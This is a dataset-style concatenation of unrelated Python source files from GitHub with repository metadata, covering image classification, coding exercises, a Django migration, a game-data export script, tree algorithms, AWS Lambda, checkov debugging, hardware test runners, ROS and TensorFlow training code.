def TahminEt(image):
#Gelen görüntü okunur ve modelin girişine hazırlanır.
output = image.copy()
image = cv2.resize(image,(224,224))
image = preprocess_input(image)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
#Hazırlanan görüntü modele verilir ve tahmin sonucu alınır.
#Etiketleri Türkçeye çevirilir, yüzdelik değerleri hesaplanır.
proba = model.predict(image)[0]
idx = np.argmax(proba)
label = lb.classes_[idx]
label = Tools.cevir(label)
label = "{}: {:.2f}% ".format(label, proba[idx] * 100)
output = cv2.putText(output, label+'-'+'ResNet', (10, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 255), 2)
output = cv2.resize(output, (300, 300))#Görüntü üzerine bu bilgiler yazılır.
return output #Görüntü döndürülür. | [
"[email protected]"
] | |
66af6fc6a28ba2a298d0c17907ca815b967fe066 | 993657cb2aabbe7bd1d705938b566384cc34918c | /JCF/pb37-44.py | 37a5d268f8e7d2c0edb4b1ec7166c0457e13787b | [] | no_license | Screwlim/Algorithms | d89e9f57cd022900341d2df6466390ad787ea00d | a5dd9b30a20bf4b75f568c18d99d0a089e1aa9d6 | refs/heads/master | 2020-07-27T03:37:38.667858 | 2020-02-25T14:25:37 | 2020-02-25T14:25:37 | 208,854,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,988 | py | #pb37
'''
print('pb37-----------------------------------')
poll = input().split(" ")
count = 0
for i in range(1,len(poll)):
if poll.count(poll[i-1]) < poll.count(poll[i]):
res = i
print(poll[res] + '가 총 ' + str(poll.count(poll[res])) + '표로 반장이 되었습니다.')
#pb38
print('pb38-----------------------------------')
scores = [int(i) for i in input().split(' ')]
candy = 0
for i in range(3):
top = max(scores)
candy += scores.count(top)
for j in range(scores.count(top)):
scores.remove(top)
print(candy)
#pb39
print('pb39-----------------------------------')
l = input()
print(l.replace('q', 'e'))
#pb40
print('pb40-----------------------------------')
limit = int(input())
fnum = int(input())
onnum = 0
onboard = 0
for i in range(fnum):
onboard += int(input())
if onboard <= limit:
onnum += 1
print(onnum)
#pb41
print('pb41-----------------------------------')
num = int(input())
for i in range(2,num):
if num%i == 0:
print('NO')
break
if i == num-1:
print('YES')
#pb42
print('pb42-----------------------------------')
#라이브러리 활용을 할 수 있는가
import datetime
#요일은 weekday()로 0-6 = 일 - 토 순으로 반환
m = int(input())
d = int(input())
def Day(a, b):
day = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
return day[datetime.date(2020, a, b).weekday()]
print(Day(m, d))
'''
#pb43
print('pb43-----------------------------------')
num = int(input())
res = []
while True:
res.append(str(num%2))
num = num//2
if num == 1:
res.append(str(1))
break
'''
for i in range(len(res)-1, -1, -1):
print(res[i], end='')
'''
res.reverse()
print(''.join(res))
#join을 활성화 하려면 res안에 있는 값이 다 str형이어야 함
#그러면 str == 모든 원소가 str형인 list?
#pb44
print('pb44-----------------------------------')
num = input()
total = 0
for i in num:
total += int(i)
print(total) | [
"[email protected]"
] | |
9a52a06a94e3a2e77b20377abdd1941d2de5376f | 8e866c25e4af2430b2bd687d929a3ac9cdc16920 | /parametros/migrations/0002_tipoincremento_descripciontipoincr.py | c96d8b017882f3cc72ef67d1cf544f9b1a9f1b72 | [] | no_license | ibuilder/Prefact | 9ea481e93f4658dbdc569224a713609dba6ef8f1 | c1d7cefce92d3cd66122292fed68300e03ff033a | refs/heads/master | 2022-01-09T13:28:55.817499 | 2018-11-09T22:02:45 | 2018-11-09T22:02:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 01:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parametros', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='tipoincremento',
name='descripcionTipoIncr',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| [
"[email protected]"
] | |
14bc6748e329b63cedbea996df25b3276bef925d | 2c4b07e4f77e60e654aa0b8501e46172d0fa3d92 | /bridge/assets/client_windows.py | 626910262e4735ea40853a75cd4e4fde21d96402 | [] | no_license | lczxxx123/yyx-bridge | cfd3f75be37cd32f9eac9f114c4f779c67a95b2c | 7ff1b875884455cfc7b97aeb0dfb616537e065ee | refs/heads/master | 2023-06-29T14:35:15.439591 | 2020-09-13T01:53:11 | 2020-09-13T01:53:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,603 | py | import json
import Globals
from DynamicConfigData import DATA_HERO, DATA_EQUIP_ATTR, DATA_EQUIP_INIT, DATA_EQUIP_RANDOM_ATTR, DATA_STORY
import com.utils.helpers as helpers
import com.const as CONST
f = open(r'\\.\pipe\b62340b3-9f87-4f38-b844-7b8d1598b64b', 'wb+', buffering=0)
try:
player = Globals.player1
if player == None:
raise Exception('Player data not available.')
heroTypeList = [
CONST.HeroType.SS_MONSTER, CONST.HeroType.SS_GHOST, CONST.HeroType.SS_ELF]
equip_attr_types = [
'maxHpAdditionVal', 'defenseAdditionVal', 'attackAdditionVal', 'maxHpAdditionRate',
'defenseAdditionRate', 'attackAdditionRate', 'speedAdditionVal', 'critRateAdditionVal', 'critPowerAdditionVal',
'debuffEnhance', 'debuffResist']
equip_attr_type_map = {value: key for (
key, value) in enumerate(equip_attr_types)}
def map_equip(id, equip):
initData = DATA_EQUIP_INIT.data.get(equip.equipId)
attrs = []
tmpList = equip.getRandAttrDict()
for key, value in tmpList.items():
attrs.append([equip_attr_type_map[key], value])
base_attr = [equip_attr_type_map[equip.baseAttrName],
equip.strengthenedBaseAttrValue]
single_attrs = DATA_EQUIP_RANDOM_ATTR.data.get(
equip.single_attr, {}).get('attrs') if equip.single_attr else []
single_attrs = [[equip_attr_type_map[
attr[0]], attr[1]] for attr in single_attrs]
return [
id,
# 'name': equip.name,
equip.suitId,
equip.getEquipInit('quality'),
equip.getPos(),
equip.equipId,
equip.strongLevel,
equip.born,
bool(equip.lock),
bool(equip.garbage),
# 'strengthened_base_attr_value': equip.strengthenedBaseAttrValue,
# 'base_attr': equip.baseAttrDict,
# 'attr': equip.attrDict,
# 'random_attr': equip.randomAttrDict,
# 'init_data': initData,
# 'rand_attr_rates': equip.randAttrRates,
attrs,
base_attr,
attrs,
[],
single_attrs
]
def map_hero(id, hero):
attr_calc = hero.getUnAwakeBattleAttr(
) if hero.awake == 0 else hero.getAwakeBattleAttr()
return [
id,
# 'uid': hero.uid,
hero.heroId,
hero._equips,
hero._level,
hero.exp,
# hero._name,
hero.nickName,
hero.born,
bool(hero.lock),
hero.rarity,
hero.skillList,
hero.awake,
hero.star,
[
[
attr_calc.baseMaxHp,
attr_calc.maxHpAdditionVal,
attr_calc.maxHpAdditionRate,
attr_calc.maxHp,
],
[
attr_calc.baseSpeed,
attr_calc.speedAdditionVal,
attr_calc.speedAdditionRate,
attr_calc.speed,
],
[
attr_calc.baseCritPower,
attr_calc.critPowerAdditionVal,
attr_calc.critPowerAdditionRate,
attr_calc.critPower,
],
[
attr_calc.baseCritRate,
attr_calc.critRateAdditionVal,
attr_calc.critRateAdditionRate,
attr_calc.critRate,
],
[
attr_calc.baseDefense,
attr_calc.defenseAdditionVal,
attr_calc.defenseAdditionRate,
attr_calc.defense,
],
[
attr_calc.baseAttack,
attr_calc.attackAdditionVal,
attr_calc.attackAdditionRate,
attr_calc.attack,
],
attr_calc.debuffEnhance,
attr_calc.debuffResist
]
]
def get_item_presets():
preset_items = helpers.getUserConfig('equipDrawer', [])
preset_names = helpers.getUserConfig('equipDrawerName', [])
presets = []
for i, items in enumerate(preset_items):
presets.append([preset_names[i], items])
return presets
def get_hero_shards():
def map(id, data):
book = data['book']
return [
id, # hero_id
player.currency.get(book[1], 0), # shard_count
player.currency.get(book[0], 0), # book_count
book[2] # book_max_shard_count
]
return [map(id, data) for id, data in DATA_HERO.data.items() if data['type'] in heroTypeList]
def map_realm_card(id, card):
return [
id,
card.itemid,
card.totalTime,
card.produceValue,
]
def get_story_tasks():
items = []
for id, _ in DATA_HERO.data.iteritems():
if id < 200 or id > 600:
continue
storyData = DATA_STORY.data.get(id)
if storyData != None:
ids = storyData.get('activityId')
if ids != None:
for id in ids:
items.append([
id, Globals.jobMgr.getJobProg(id)
])
return items
data = [
[player.short_id, player.server_id, player.name, player.level],
map(lambda v: int(v), [
player.currency.get(CONST.CurrencyType.COIN, 0), # COIN
player.currency.get(CONST.CurrencyType.GOLD, 0), # GOUYU
player.currency.get(
CONST.CurrencyType.STRENGTH, 0), # STRENGTH
player.currency.get(900273, 0), # YINGBING
player.currency.get(900012, 0), # RONGYU
player.currency.get(900016, 0), # XUNZHANG
player.currency.get(900090, 0), # GONGXUN
player.currency.get(900215, 0), # YLJZS
player.currency.get(900000, 0), # HUNYU
player.currency.get(900023, 0), # PIFU
player.currency.get(900024, 0), # TUPO
player.currency.get(490002, 0), # BAIPIAO broken_amulet
player.currency.get(490001, 0), # LANPIAO mystery_amulet
player.currency.get(490004, 0), # XIANSHI ar_amulet
player.currency.get(900178, 0), # YUZHA ofuda
player.currency.get(900188, 0), # JINYUZHA gold_ofuda
player.currency.get(900216, 0), # 八岐大蛇鳞片 scale
player.currency.get(900217, 0), # 大蛇的逆鳞 reverse_scale
player.currency.get(900218, 0), # 逢魔之魂 demon_soul
player.currency.get(900041, 0), # 痴念之卷 foolery_pass
player.currency.get(906058, 0) # SP皮肤券
]),
[map_hero(id, i) for id, i in player.heroes.items()
if DATA_HERO.data.get(i.heroId).get('type') in heroTypeList],
[map_equip(id, e) for id, e in player.inventory.items()],
get_item_presets(),
get_hero_shards(),
[map_realm_card(id, data)
for id, data in Globals.player1.myJiejieCardDataDict.items()],
get_story_tasks()
]
f.write(json.dumps(data, ensure_ascii=False).encode('utf8'))
except Exception as e:
f.write(json.dumps({
'error': str(e)
}, ensure_ascii=False).encode('utf8'))
f.close()
| [
"[email protected]"
] | |
502be4bc987b6810c8c21512e61f399778f76f09 | 77b07ca84c059d264cbfabc872d03d66b454aa44 | /Calc.py | 34ba6f4bfb83b83af2399ebf4875d535953eb039 | [] | no_license | 10376086/AdvancedProgramming- | 44784a9acf58f5d83c55de8b30abb49ad61de866 | 7ef3e94042dbde19a177a700017b2e9ed016fda6 | refs/heads/master | 2020-04-15T23:42:09.253799 | 2019-01-10T20:16:40 | 2019-01-10T20:16:40 | 165,114,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py |
def add(first, second):
return first + second
def subtract(first, second):
return first + second
def multiply(first, second):
return first * second | [
"[email protected]"
] | |
bdec81e74eafb8a5c8eef6e571073c135807f327 | 17697a5d83991139de35524dc5369a67ebc48335 | /bottom_view.py | c2c3364c492b26d6721e4b719a342ff40f56b4fd | [] | no_license | troj4n/Trees | 3f4c1f0b62fd79225fdf596f01adfd8695a73954 | dbd5fbefb4a4b799b042fd8cdc0f613e86367397 | refs/heads/master | 2020-06-04T05:31:40.173514 | 2019-06-21T09:55:35 | 2019-06-21T09:55:35 | 191,889,687 | 0 | 0 | null | 2019-06-14T09:52:48 | 2019-06-14T06:41:10 | Python | UTF-8 | Python | false | false | 1,640 | py | # coding: utf-8
# Your code here!
from collections import deque
#initialise node
class Node:
def __init__(self,data):
self.data=data
self.left=None
self.right=None
self.hd=None
def findBottomView(root):
if root==None:
return
hd=0
root.hd=hd
#initialise a dictionary to store <hd,node_with_hd>
hd_dict={}
q=deque()
#adding root to queue
q.append(root)
while q:
#while queue is not empty , delete nodes fom left one by one and update hd as current node's hd.This will help in setting the hd for left and right child
temp=q.popleft()
hd=temp.hd
#if presnt in hd_dict, the get the value , else make the key and set the value to 0.
hd_dict[hd]=hd_dict.get(hd,0)
#always update the last node traversed on a horizontal distance
hd_dict[hd]=temp.data
# if left node exists, set it's hd to its root hd-1 and append it to q
if temp.left!=None:
q.append(temp.left)
temp.left.hd=temp.hd-1
# if right node exists, set it's hd to its root hd+1 and append it to q
if temp.right!=None:
q.append(temp.right)
temp.right.hd=temp.hd+1
#print all the values in dictionary values.
result=hd_dict.values()
print ' '.join(str(x) for x in result)
root=Node(20)
root.left=Node(8)
root.right=Node(22)
root.left.left=Node(5)
root.left.right=Node(30)
root.right.left=Node(4)
root.right.right=Node(25)
root.left.right.left=Node(10)
root.left.right.right=Node(14)
print "Bottom view of the tree is "
findBottomView(root)
| [
"[email protected]"
] | |
9e41b715ddb0c07119dda3e386a628a8d2cc9564 | 867c8f58096777714fb6617669348bb8898811c3 | /devGetOffers.py | 437c3581a628d2a5c878c22e06ed4e6df078b38c | [] | no_license | dazuna/PyScripts-for-AWS-Serverless | f41c4e0fe22a1824e56c79d00cd24a77a501650a | 4136923cab12cc1c2d4610b1ce68e6e04f2ea4d5 | refs/heads/master | 2022-11-06T04:31:54.392129 | 2020-06-21T19:24:33 | 2020-06-21T19:24:33 | 273,969,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | import boto3
import json
import decimal
from boto3.dynamodb.conditions import Key, Attr
dynamo = boto3.client('dynamodb')
def respond(err, res=None):
return {
'statusCode': '400' if err else '200',
'body': err.message if err else json.dumps(res,cls=DecimalEncoder),
'headers': {
'Content-Type': 'application/json',
},
}
def lambda_handler(event, context):
qsParam = event['queryStringParameters']
offers = getOffers(qsParam)
# if qsParam.has_key('companyName'):
# query = qsParam['companyName']
# offers = []
# offers.append(query.capitalize())
# offers.append(query.lower())
# offers.append(query.upper())
# print offers
return respond(None, offers)
def getOffers(qsParam):
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
tableUsers = dynamodb.Table('Offers')
# values will be set based on the response.
if qsParam is not None:
if qsParam.has_key('company'): return tableUsers.scan(FilterExpression=Attr('company').eq(qsParam['company']))
if qsParam.has_key('companyName'): return tableUsers.scan(FilterExpression=Attr('searchField').contains(qsParam['companyName']))
else:
return tableUsers.scan()
# hItems = json.dumps(hItems, cls=DecimalEncoder)
class DecimalEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
| [
"[email protected]"
] | |
81a3bb51d5a1e975a28e398874c80a57e85d3738 | d6f7be19eedb72f9c3a5ac7de83133232c21d395 | /app/extract.py | 3001e6b21730733e3399d2bb8b5b22547172e334 | [
"MIT"
] | permissive | kmalakhova/back-end-mempeasy | 6a2723b54eebc86496eda7c3c65b3f7b6df6e4ef | 9d918d97fa88189b1dbaf8b0ac6fe430c449a661 | refs/heads/master | 2023-07-16T05:58:50.178178 | 2021-08-24T01:19:50 | 2021-08-24T01:19:50 | 390,390,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | def json_extract(obj, key):
"""Recursively fetches values from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively searches for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key and len(v.split()) != 1:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
values = extract(obj, arr, key)
return values
| [
"[email protected]"
] | |
2fff8b0b4c27cbdf63118589f635f7007234d0ac | daf3c52a9a26e00e1502b4c991b5d7777d444469 | /src/analyzer/abstract_reader.py | 78dc16fe2e225b1aab61a74e3c9c5851afe06c07 | [
"MIT"
] | permissive | rodchenk/time-expenses | a22a5b0ff21feaca65e2c17bc9ed4e23bae93174 | b0b37f00514c9f54300097a01f53f8923937caa9 | refs/heads/master | 2022-10-28T19:59:13.703717 | 2020-06-06T14:20:21 | 2020-06-06T14:20:21 | 267,668,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py |
class AbstractReader(object):
def __init__(self, counter_callback, filename):
self._counter = counter_callback
self.filename = filename
self.total_chars, self.total_words, self.total_charts, self.total_images, self.total_tables = 0, 0, 0, 0, 0
def get_stats(self):
self._counter()
return {
'file': self.filename,
'chars': self.total_chars,
'words': self.total_words,
'charts': self.total_charts,
'images': self.total_images,
'tables': self.total_tables
} | [
"[email protected]"
] | |
dd5617275d2a87e52a380d2ccfcdf4777e0566ba | 45e376ae66b78b17788b1d3575b334b2cb1d0b1c | /checkov/common/graph/checks_infra/debug.py | 26b247b24b08837b95bd15668c25aedf4d45d7c6 | [
"Apache-2.0"
] | permissive | bridgecrewio/checkov | aeb8febed2ed90e61d5755f8f9d80b125362644d | e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d | refs/heads/main | 2023-08-31T06:57:21.990147 | 2023-08-30T23:01:47 | 2023-08-30T23:01:47 | 224,386,599 | 5,929 | 1,056 | Apache-2.0 | 2023-09-14T20:10:23 | 2019-11-27T08:55:14 | Python | UTF-8 | Python | false | false | 6,589 | py | from __future__ import annotations
import json
import logging
from collections.abc import Iterable
from typing import Any, TYPE_CHECKING
import yaml
from termcolor import colored
from checkov.common.graph.graph_builder import CustomAttributes
from checkov.common.resource_code_logger_filter import add_resource_code_filter_to_logger
from checkov.common.util.env_vars_config import env_vars_config
if TYPE_CHECKING:
from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
logger = logging.getLogger(__name__)
add_resource_code_filter_to_logger(logger)
def graph_check(check_id: str, check_name: str) -> None:
if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
return
print(f'\nEvaluating graph policy: "{check_id}" - "{check_name}"')
def resource_types(resource_types: Iterable[str], resource_count: int, operator: str) -> None:
if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
return
resource_types_str = '", "'.join(resource_types)
print(
f'\nFound {resource_count} resources with resource types: "{resource_types_str}" to check against operator: "{operator}"'
)
def attribute_block(
resource_types: Iterable[str],
attribute: str | None,
operator: str,
value: str | list[str] | None,
resource: dict[str, Any],
status: str,
) -> None:
if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
return
attribute_block_conf = _create_attribute_block(
resource_types=resource_types, attribute=attribute, operator=operator, value=value
)
color = "green" if status == "passed" else "red"
print("\nEvaluated block:\n")
print(colored(yaml.dump([attribute_block_conf], sort_keys=False), "blue"))
print("and got:")
print(colored(f'\nResource "{resource[CustomAttributes.ID]}" {status}:', color))
print(colored(json.dumps(resource[CustomAttributes.CONFIG], indent=2), "yellow"))
def connection_block(
resource_types: Iterable[str],
connected_resource_types: Iterable[str],
operator: str,
passed_resources: list[dict[str, Any]],
failed_resources: list[dict[str, Any]],
) -> None:
if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
return
connection_block_conf = _create_connection_block(
resource_types=resource_types,
connected_resource_types=connected_resource_types,
operator=operator,
)
passed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in passed_resources)
failed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in failed_resources)
print("\nEvaluated blocks:\n")
print(colored(yaml.dump([connection_block_conf], sort_keys=False), "blue"))
print("and got:\n")
print(colored(f'Passed resources: "{passed_resources_str}"', "green"))
print(colored(f'Failed resources: "{failed_resources_str}"', "red"))
def complex_connection_block(
solvers: list[BaseSolver],
operator: str,
passed_resources: list[dict[str, Any]],
failed_resources: list[dict[str, Any]],
) -> None:
if not env_vars_config.EXPERIMENTAL_GRAPH_DEBUG:
return
# to prevent circular dependencies
from checkov.common.checks_infra.solvers.attribute_solvers.base_attribute_solver import BaseAttributeSolver
from checkov.common.checks_infra.solvers.complex_solvers.base_complex_solver import BaseComplexSolver
from checkov.common.checks_infra.solvers.connections_solvers.base_connection_solver import BaseConnectionSolver
from checkov.common.checks_infra.solvers.connections_solvers.complex_connection_solver import (
ComplexConnectionSolver,
)
from checkov.common.checks_infra.solvers.filter_solvers.base_filter_solver import BaseFilterSolver
complex_connection_block = []
for solver in solvers:
if isinstance(solver, BaseAttributeSolver):
block = _create_attribute_block(
resource_types=solver.resource_types,
attribute=solver.attribute,
operator=solver.operator,
value=solver.value,
)
elif isinstance(solver, BaseFilterSolver):
block = _create_filter_block(attribute=solver.attribute, operator=solver.operator, value=solver.value)
elif isinstance(solver, (ComplexConnectionSolver, BaseComplexSolver)):
# ComplexConnectionSolver check needs to be before BaseConnectionSolver, because it is a subclass
block = {solver.operator: ["..." for _ in solver.solvers]}
elif isinstance(solver, BaseConnectionSolver):
block = _create_connection_block(
resource_types=solver.resource_types,
connected_resource_types=solver.connected_resources_types,
operator=solver.operator,
)
else:
logger.info(f"Unsupported solver type {type(solver)} found")
continue
complex_connection_block.append(block)
passed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in passed_resources)
failed_resources_str = '", "'.join(resource[CustomAttributes.ID] for resource in failed_resources)
print("\nEvaluated blocks:\n")
print(colored(yaml.dump([{operator: complex_connection_block}], sort_keys=False), "blue"))
print("and got:\n")
print(colored(f'Passed resources: "{passed_resources_str}"', "green"))
print(colored(f'Failed resources: "{failed_resources_str}"', "red"))
def _create_attribute_block(
resource_types: Iterable[str], attribute: str | None, operator: str, value: str | list[str] | None
) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "attribute",
"resource_types": resource_types,
"attribute": attribute,
"operator": operator,
}
if value is not None:
attribute_block_conf["value"] = value
return attribute_block_conf
def _create_connection_block(
resource_types: Iterable[str], connected_resource_types: Iterable[str], operator: str
) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "connection",
"resource_types": resource_types,
"connected_resource_types": connected_resource_types,
"operator": operator,
}
return attribute_block_conf
def _create_filter_block(attribute: str | None, operator: str, value: str | list[str]) -> dict[str, Any]:
attribute_block_conf = {
"cond_type": "filter",
"attribute": attribute,
"operator": operator,
"value": value,
}
return attribute_block_conf
| [
"[email protected]"
] | |
5c3a9fa4804996502108001cdc92415cd75c53d1 | 037e7828fcc4779629bf9089d0677abbae6590eb | /run_test_raas.py | 9622b17e28cf6e447e02d2dd685d109fc5795007 | [] | no_license | ARMmbed/run_tests_linux | af11a82372e0480fa5b9c883607d7fe279da8931 | de643663227b9d2cdca884fa67575f1ce48e9196 | refs/heads/master | 2023-03-16T13:56:40.577605 | 2017-02-28T17:28:11 | 2017-02-28T17:28:11 | 58,552,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,230 | py | import raas_client
def run_test_raas(binary, platform_name="K64F"):
print "Running", binary
print "On", platform_name
client = raas_client.RaasClient(host="193.208.80.31", port=8000)
try:
k64f = client.allocate({"platform_name": [platform_name]})
print "allocated", k64f.info()
print "flashing...",
k64f.flash(binary)
print "flashed"
serial_params = raas_client.SerialParameters(lineMode=True, baudrate=9600, bufferSize=256)
print "opening connection to k64f"
k64f.openConnection(parameters=serial_params)
print "resetting...",
k64f.reset()
print "reset"
data = "start"
print "starting serial capture"
serial_out = ""
while(data != ""):
data = k64f.readline(timeout=15)
serial_out += data
print "[DATA]", data.strip()
k64f.closeConnection()
k64f.release()
finally:
client.disconnect()
return serial_out
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("binary", help="Path to binary")
args = parser.parse_args()
print run_test_raas(args.binary)
| [
"[email protected]"
] | |
24007ef5ef566f228a7667133ecccce9e2ca71b6 | 9be143a314f58bad3ca607e8c322415e6d05a30f | /venv/Scripts/pip3-script.py | 5c0139f6223e17f6c9f55c676299039aed715457 | [] | no_license | zibb03/Face-Emotion-Recognition | baec3b7d57636642641e52afd73f1ef5436a51d6 | fd5b04fc34fc8cfa9415ae7ab5fa85316c3be6d4 | refs/heads/main | 2023-06-18T15:49:40.905788 | 2021-07-19T15:05:00 | 2021-07-19T15:05:00 | 355,542,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!C:\Users\user\PycharmProjects\OpenCV\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
2949ad30d2c1f779dd0f7906f17943d31c121fb1 | eac22714038e840028cc5abb72bc750004626ebb | /mct_camera_tools/nodes/image_proc_master.py | 3316d09e4957ac3d0f6500030feeee1cccdedf4f | [
"Apache-2.0"
] | permissive | iorodeo/mct | 79b19f6dab9f6567452df7274d67245bf64b1801 | fa8b85f36533c9b1486ca4f6b0c40c3daa6f4e11 | refs/heads/master | 2022-11-11T18:03:18.178182 | 2014-08-20T19:21:27 | 2014-08-20T19:21:27 | 273,790,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,780 | py | #!/usr/bin/env python
from __future__ import print_function
import roslib
roslib.load_manifest('mct_camera_tools')
import rospy
import os
import os.path
import tempfile
import subprocess
from mct_xml_tools import launch
# Services
from mct_msg_and_srv.srv import CommandString
from mct_msg_and_srv.srv import CommandStringResponse
class Image_Proc_Master(object):
"""
Image proc master node. Provides service which launches/kills image_proc nodes for
every camera with a calibratoin.
"""
def __init__(self):
self.tmp_dir = tempfile.gettempdir()
self.launch_file = os.path.join(self.tmp_dir,'image_proc.launch')
self.image_proc_popen = None
rospy.on_shutdown(self.clean_up)
rospy.init_node('image_proc_master')
self.camera_srv = rospy.Service(
'image_proc_master',
CommandString,
self.handle_image_proc_srv,
)
def handle_image_proc_srv(self,req):
"""
Handles requests to lauch/kill the image proc nodes.
"""
command = req.command.lower()
response = True
message = ''
if command == 'start':
if self.image_proc_popen is None:
self.launch_image_proc_nodes()
else:
response = False
message = 'image proc nodes already running'
elif command == 'stop':
if self.image_proc_popen is not None:
self.kill_image_proc_nodes()
else:
response = False
message = 'image proc nodes not running'
else:
response = False
message = 'uknown command: {0}'.format(command)
return CommandStringResponse(response,message)
def launch_image_proc_nodes(self):
"""
Launches the image_proc nodes.
"""
if self.image_proc_popen is None:
launch.create_image_proc_launch(self.launch_file)
self.image_proc_popen = subprocess.Popen(['roslaunch',self.launch_file])
def kill_image_proc_nodes(self):
"""
Kills the image_proc nodes.
"""
if self.image_proc_popen is not None:
self.image_proc_popen.send_signal(subprocess.signal.SIGINT)
self.image_proc_popen = None
try:
os.remove(self.launch_file)
except OSError, e:
rospy.logwarn('Error removing image_proc launch file: {0}'.format(str(e)))
def clean_up(self):
self.kill_image_proc_nodes()
def run(self):
rospy.spin()
# -----------------------------------------------------------------------------
if __name__ == '__main__':
node = Image_Proc_Master()
node.run()
| [
"[email protected]"
] | |
f9023322bed3e99f7881e8b99b2959222c568474 | a22bdba754308dc8d64e6260957bbb028f75abe6 | /Utilities/saver/attoclass.py | 3246a476fdd3190d1c738d96bea8e2376eac686b | [] | no_license | HowDoIUseThis/Nowack_Lab | f592dc3b59bbbe36ae9253dc95a04cf6d8a0f0de | a943896b3cb8b3a326e1a2ef698b11a01884205a | refs/heads/master | 2021-01-12T22:07:13.105549 | 2016-08-02T21:59:19 | 2016-08-02T21:59:19 | 64,960,471 | 0 | 1 | null | 2016-08-04T19:09:10 | 2016-08-04T19:09:10 | null | UTF-8 | Python | false | false | 149 | py | from saver import Saver
class Atto(Saver):
def __init__(self, direction='x'):
super(Atto, self).__init__();
self.c = direction;
| [
"[email protected]"
] | |
b9c56ac1d31b2218826dbd63b673f4c3cff2e16a | a2f78983557c1ead7b2a7c3e720d4719099878b9 | /python/ray/experimental/sgd/tf/tf_runner.py | 384136ba79630ef2660e8ee46da3cf60f3455ccf | [
"Apache-2.0",
"MIT"
] | permissive | Senmumu/ray | 3fc914a0a5d9da8fcaa3411bc04be7fba3ce6bbd | 130b8f21da4fb5383b079493faaea5d81065b772 | refs/heads/master | 2020-07-18T12:08:51.862689 | 2019-09-03T22:36:25 | 2019-09-03T22:36:25 | 206,242,928 | 1 | 0 | Apache-2.0 | 2019-09-04T05:59:44 | 2019-09-04T05:59:44 | null | UTF-8 | Python | false | false | 5,250 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import json
import os
import numpy as np
import ray
import ray.services
from ray.experimental.sgd import utils
logger = logging.getLogger(__name__)
def _try_import_strategy():
"""Late import for Tesnorflow"""
from tensorflow.distribute.experimental import MultiWorkerMirroredStrategy
return MultiWorkerMirroredStrategy
class TFRunner(object):
"""Manages a TensorFlow model for training."""
def __init__(self, model_creator, data_creator, config=None,
verbose=False):
"""Initializes the runner.
Args:
model_creator (dict -> Model): see tf_trainer.py.
data_creator (dict -> tf.Dataset, tf.Dataset): see tf_trainer.py.
config (dict): see tf_trainer.py.
verbose (bool): Outputs training data if true.
"""
self.model_creator = model_creator
self.data_creator = data_creator
self.config = {} if config is None else config
self.epoch = 0
self.verbose = verbose
def setup(self):
"""Initializes the model."""
logger.debug("Creating dataset")
self.train_dataset, self.test_dataset = self.data_creator(self.config)
logger.debug("Creating model")
self.model = self.model_creator(self.config)
def setup_distributed(self, urls, world_rank, world_size):
"""Sets up TensorFLow distributed environment and initializes the model.
Args:
urls (str): the URLs that each node uses to connect.
world_rank (int): the index of the runner.
world_size (int): the total number of runners.
"""
assert len(urls) == world_size
tf_config = {
"cluster": {
"worker": urls
},
"task": {
"index": world_rank,
"type": "worker"
}
}
os.environ["TF_CONFIG"] = json.dumps(tf_config)
MultiWorkerMirroredStrategy = _try_import_strategy()
self.strategy = MultiWorkerMirroredStrategy()
self.train_dataset, self.test_dataset = self.data_creator(self.config)
logger.debug("Creating model with MultiWorkerMirroredStrategy")
with self.strategy.scope():
self.model = self.model_creator(self.config)
# For use in model.evaluate()
self.local_model = None
def step(self):
"""Runs a training epoch and updates the model parameters."""
fit_default_config = {"verbose": self.verbose}
fit_default_config.update(self.config.get("fit_config", {}))
history = self.model.fit(self.train_dataset, **fit_default_config)
if history is None:
stats = {}
else:
stats = {"train_" + k: v[-1] for k, v in history.history.items()}
self.epoch += 1
